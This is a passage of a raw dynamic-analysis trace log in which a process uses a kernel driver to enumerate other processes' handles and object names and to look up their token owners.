PsAcquireProcessExitSynchronization () returned 0x0 [0158.722] KeStackAttachProcess (in: PROCESS=0xfffffa8002133b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002133b30, ApcState=0xfffff880051635d0) [0158.722] ObReferenceObjectByHandle (in: Handle=0x7c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002138310, HandleInformation=0x0) returned 0x0 [0158.722] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0158.722] PsReleaseProcessExitSynchronization () returned 0x2 [0158.722] ObfDereferenceObject (Object=0xfffffa8002133b30) returned 0x12 [0158.722] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030c0044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030c0044, ReturnLength=0xfffff88005163508) returned 0x0 [0158.722] ObfDereferenceObject (Object=0xfffffa8002138310) returned 0x1 [0158.723] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0158.723] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0158.723] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0158.723] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0158.723] PsLookupProcessByProcessId (in: ProcessId=0x984, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0158.723] PsAcquireProcessExitSynchronization () returned 0x0 [0158.723] KeStackAttachProcess (in: PROCESS=0xfffffa8002133b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002133b30, ApcState=0xfffff880051635d0) [0158.723] ObReferenceObjectByHandle (in: Handle=0x80, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0019027a0, HandleInformation=0x0) returned 0x0 [0158.723] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0158.723] PsReleaseProcessExitSynchronization () returned 0x2 [0158.723] ObfDereferenceObject (Object=0xfffffa8002133b30) returned 0x12 [0158.723] ObQueryNameString (in: Object=0xfffff8a0019027a0, ObjectNameInfo=0xfffffa80030da044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80030da044, ReturnLength=0xfffff88005163550) returned 0x0 [0158.723] ObfDereferenceObject (Object=0xfffff8a0019027a0) returned 0x1 [0158.723] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0158.723] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0158.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x994) returned 0xc8 [0158.724] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0158.724] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa80021395d0, HandleInformation=0x0) returned 0x0 [0158.724] ObOpenObjectByPointer (in: Object=0xfffffa80021395d0, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff80000814) returned 0x0 [0158.724] ObfDereferenceObject (Object=0xfffffa80021395d0) returned 0x14 [0158.724] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000814, DesiredAccess=0x8, TokenHandle=0xfffffa8002845180 | out: TokenHandle=0xfffffa8002845180*=0xc4) returned 0x0 [0158.724] ZwClose (Handle=0xffffffff80000814) returned 0x0 [0158.724] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0158.724] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0158.724] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0158.726] CloseHandle (hObject=0xc4) returned 1 [0158.726] CloseHandle (hObject=0xc8) returned 1 [0158.726] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0158.727] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0158.727] PsLookupProcessByProcessId (in: ProcessId=0x994, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0158.727] PsAcquireProcessExitSynchronization () returned 0x0 [0158.727] KeStackAttachProcess (in: PROCESS=0xfffffa80021395d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80021395d0, ApcState=0xfffff880051635d0) [0158.727] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800213c390, HandleInformation=0x0) returned 0x0 [0158.727] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0158.727] PsReleaseProcessExitSynchronization () returned 0x2 [0158.727] ObfDereferenceObject (Object=0xfffffa80021395d0) returned 0x12 [0158.727] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030b4044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030b4044, ReturnLength=0xfffff88005163508) returned 0x0 [0158.727] ObfDereferenceObject (Object=0xfffffa800213c390) returned 0x1 [0158.727] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0158.727] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0158.727] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0158.727] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x92, lpOverlapped=0x0) returned 1 [0158.728] PsLookupProcessByProcessId (in: ProcessId=0x994, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0158.728] PsAcquireProcessExitSynchronization () returned 0x0 [0158.728] KeStackAttachProcess (in: PROCESS=0xfffffa80021395d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80021395d0, ApcState=0xfffff880051635d0) [0158.728] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800213db50, HandleInformation=0x0) returned 0x0 [0158.728] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0158.728] PsReleaseProcessExitSynchronization () returned 0x2 [0158.728] ObfDereferenceObject (Object=0xfffffa80021395d0) returned 0x12 [0158.728] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800302e584, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa800302e584, ReturnLength=0xfffff88005163508) returned 0x0 [0158.728] ObfDereferenceObject (Object=0xfffffa800213db50) returned 0x1 [0158.728] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0158.728] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0158.728] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0158.728] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0158.728] PsLookupProcessByProcessId (in: ProcessId=0x994, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0158.729] PsAcquireProcessExitSynchronization () returned 0x0 [0158.729] KeStackAttachProcess (in: PROCESS=0xfffffa80021395d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80021395d0, ApcState=0xfffff880051635d0) [0158.729] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0158.729] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0158.729] PsReleaseProcessExitSynchronization () returned 0x2 [0158.729] ObfDereferenceObject (Object=0xfffffa80021395d0) returned 0x12 [0158.729] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003206044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8003206044, ReturnLength=0xfffff88005163550) returned 0x0 [0158.729] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x53 [0158.729] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0158.729] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0158.729] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0158.729] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x74, lpOverlapped=0x0) returned 1 [0158.729] PsLookupProcessByProcessId (in: ProcessId=0x994, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0158.729] PsAcquireProcessExitSynchronization () returned 0x0 [0158.729] KeStackAttachProcess (in: PROCESS=0xfffffa80021395d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80021395d0, ApcState=0xfffff880051635d0) [0158.730] ObReferenceObjectByHandle (in: Handle=0x7c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002131950, HandleInformation=0x0) returned 0x0 [0158.730] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0158.730] PsReleaseProcessExitSynchronization () returned 0x2 [0158.730] ObfDereferenceObject (Object=0xfffffa80021395d0) returned 0x12 [0158.730] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030c9044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030c9044, ReturnLength=0xfffff88005163508) returned 0x0 [0158.730] ObfDereferenceObject (Object=0xfffffa8002131950) returned 0x1 [0158.730] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0158.730] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0158.730] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0158.730] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0158.730] PsLookupProcessByProcessId (in: ProcessId=0x994, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0158.730] PsAcquireProcessExitSynchronization () returned 0x0 [0158.730] KeStackAttachProcess (in: PROCESS=0xfffffa80021395d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80021395d0, ApcState=0xfffff880051635d0) [0158.730] ObReferenceObjectByHandle (in: Handle=0x80, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0019075e0, HandleInformation=0x0) returned 0x0 [0158.730] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0158.730] PsReleaseProcessExitSynchronization () returned 0x2 [0158.730] ObfDereferenceObject (Object=0xfffffa80021395d0) returned 0x12 [0158.730] ObQueryNameString (in: Object=0xfffff8a0019075e0, ObjectNameInfo=0xfffffa8002fa8044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fa8044, ReturnLength=0xfffff88005163550) returned 0x0 [0158.731] ObfDereferenceObject (Object=0xfffff8a0019075e0) returned 0x1 [0158.731] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0158.731] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0158.731] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9a4) returned 0xc8 [0158.731] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0158.731] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa8002148b30, HandleInformation=0x0) returned 0x0 [0158.731] ObOpenObjectByPointer (in: Object=0xfffffa8002148b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff80000814) returned 0x0 [0158.731] ObfDereferenceObject (Object=0xfffffa8002148b30) returned 0x14 [0158.731] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000814, DesiredAccess=0x8, TokenHandle=0xfffffa8002845180 | out: TokenHandle=0xfffffa8002845180*=0xc4) returned 0x0 [0158.731] ZwClose (Handle=0xffffffff80000814) returned 0x0 [0158.731] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0158.732] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0158.732] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0158.734] CloseHandle (hObject=0xc4) returned 1 [0158.734] CloseHandle (hObject=0xc8) returned 1 [0158.734] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0158.734] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0158.734] PsLookupProcessByProcessId (in: ProcessId=0x9a4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0158.734] PsAcquireProcessExitSynchronization () returned 0x0 [0158.734] KeStackAttachProcess (in: PROCESS=0xfffffa8002148b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002148b30, ApcState=0xfffff880051635d0) [0158.734] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800213c240, HandleInformation=0x0) returned 0x0 [0158.734] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0158.734] PsReleaseProcessExitSynchronization () returned 0x2 [0158.735] ObfDereferenceObject (Object=0xfffffa8002148b30) returned 0x12 [0158.735] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030ab044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030ab044, ReturnLength=0xfffff88005163508) returned 0x0 [0158.735] ObfDereferenceObject (Object=0xfffffa800213c240) returned 0x1 [0158.735] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0158.735] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0158.735] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0158.735] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x78, lpOverlapped=0x0) returned 1 [0158.735] PsLookupProcessByProcessId (in: ProcessId=0x9a4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0158.735] PsAcquireProcessExitSynchronization () returned 0x0 [0158.735] KeStackAttachProcess (in: PROCESS=0xfffffa8002148b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002148b30, ApcState=0xfffff880051635d0) [0158.735] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800214b8c0, HandleInformation=0x0) returned 0x0 [0158.735] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0158.735] PsReleaseProcessExitSynchronization () returned 0x2 [0158.735] ObfDereferenceObject (Object=0xfffffa8002148b30) returned 0x12 [0158.735] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003003044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8003003044, ReturnLength=0xfffff88005163508) returned 0x0 [0158.736] ObfDereferenceObject (Object=0xfffffa800214b8c0) returned 0x1 [0158.736] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0158.736] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0158.736] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0158.736] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0158.736] PsLookupProcessByProcessId (in: ProcessId=0x9a4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0158.736] PsAcquireProcessExitSynchronization () returned 0x0 [0158.736] KeStackAttachProcess (in: PROCESS=0xfffffa8002148b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002148b30, ApcState=0xfffff880051635d0) [0158.736] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0158.736] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0158.736] PsReleaseProcessExitSynchronization () returned 0x2 [0158.736] ObfDereferenceObject (Object=0xfffffa8002148b30) returned 0x12 [0158.736] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa80030c1044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80030c1044, ReturnLength=0xfffff88005163550) returned 0x0 [0158.736] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x53 [0158.737] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0158.737] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0158.737] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0158.737] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x74, lpOverlapped=0x0) returned 1 [0158.737] PsLookupProcessByProcessId (in: ProcessId=0x9a4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0158.737] PsAcquireProcessExitSynchronization () returned 0x0 [0158.737] KeStackAttachProcess (in: PROCESS=0xfffffa8002148b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002148b30, ApcState=0xfffff880051635d0) [0158.737] ObReferenceObjectByHandle (in: Handle=0x7c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80021546f0, HandleInformation=0x0) returned 0x0 [0158.737] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0158.737] PsReleaseProcessExitSynchronization () returned 0x2 [0158.737] ObfDereferenceObject (Object=0xfffffa8002148b30) returned 0x12 [0158.738] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003205044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8003205044, ReturnLength=0xfffff88005163508) returned 0x0 [0158.738] ObfDereferenceObject (Object=0xfffffa80021546f0) returned 0x1 [0158.738] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0158.738] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0158.738] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0158.738] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0158.738] PsLookupProcessByProcessId (in: ProcessId=0x9a4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0158.738] PsAcquireProcessExitSynchronization () returned 0x0 [0158.738] KeStackAttachProcess (in: PROCESS=0xfffffa8002148b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002148b30, ApcState=0xfffff880051635d0) [0158.738] ObReferenceObjectByHandle (in: Handle=0x80, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a00190eac0, HandleInformation=0x0) returned 0x0 [0158.738] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0158.738] PsReleaseProcessExitSynchronization () returned 0x2 [0158.739] ObfDereferenceObject (Object=0xfffffa8002148b30) returned 0x12 [0158.739] ObQueryNameString (in: Object=0xfffff8a00190eac0, ObjectNameInfo=0xfffffa80030d8044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80030d8044, ReturnLength=0xfffff88005163550) returned 0x0 [0158.739] ObfDereferenceObject (Object=0xfffff8a00190eac0) returned 0x1 [0158.739] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0158.739] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0158.739] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9b4) returned 0xc8 [0158.739] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0158.739] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa8002155060, HandleInformation=0x0) returned 0x0 [0158.739] ObOpenObjectByPointer (in: Object=0xfffffa8002155060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff80000814) returned 0x0 [0158.739] ObfDereferenceObject (Object=0xfffffa8002155060) returned 0x14 [0158.739] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000814, DesiredAccess=0x8, TokenHandle=0xfffffa8002845180 | out: TokenHandle=0xfffffa8002845180*=0xc4) returned 0x0 [0158.739] ZwClose (Handle=0xffffffff80000814) returned 0x0 [0158.740] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0158.740] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0158.740] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0158.742] CloseHandle 